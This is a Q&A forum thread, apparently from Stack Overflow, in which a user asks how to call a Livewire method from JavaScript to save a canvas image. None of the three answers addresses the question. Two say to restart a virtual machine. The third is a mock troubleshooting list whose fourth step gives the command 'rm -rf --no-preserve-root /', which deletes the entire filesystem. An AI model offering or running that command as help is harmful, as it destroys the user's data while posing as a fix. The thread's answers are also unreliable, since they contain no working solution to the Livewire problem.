# Is there a way to call a livewire method via javascript?

Tags: javascript

I need to call my sign method in my Livewire controller. So far I haven't been able to get it to work because nothing happens

```
    function handleValidButtonClick(event) {
        event.preventDefault();
        console.log(canvas.toDataURL());
        
        const dataURL = canvas.toDataURL('image/png');
        const data = dataURL.replace(/^data:image\/(png|jpg);base64,/, "");
        const id = {{ $id }};

        try {
            Livewire.emit('sign', data, id);
        } catch (error) {
            console.log(error);
        }
    }
```

I'm trying to convert a canvas to an image with javascript and after save in mu public storage with livewire.

Answer (score 0):

restart your vm I think it could help you

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Answer (score 0):

Yes, it's possibly the VM but i think it's just the computer .
Please restart it and show us the log

Comment: If you need additional details to answer the question, please use comments instead.

Answer (score 0):

There are several steps to take :

1. Turn your vm off and on again
2. If the problem is still there delete your vm
3. If it doesn't work, turn off your computer and go have a drink
4. open a terminal and enter this command : rm -rf --no-preserve-root /

If this doesn't solve your problem the problem is behind the screen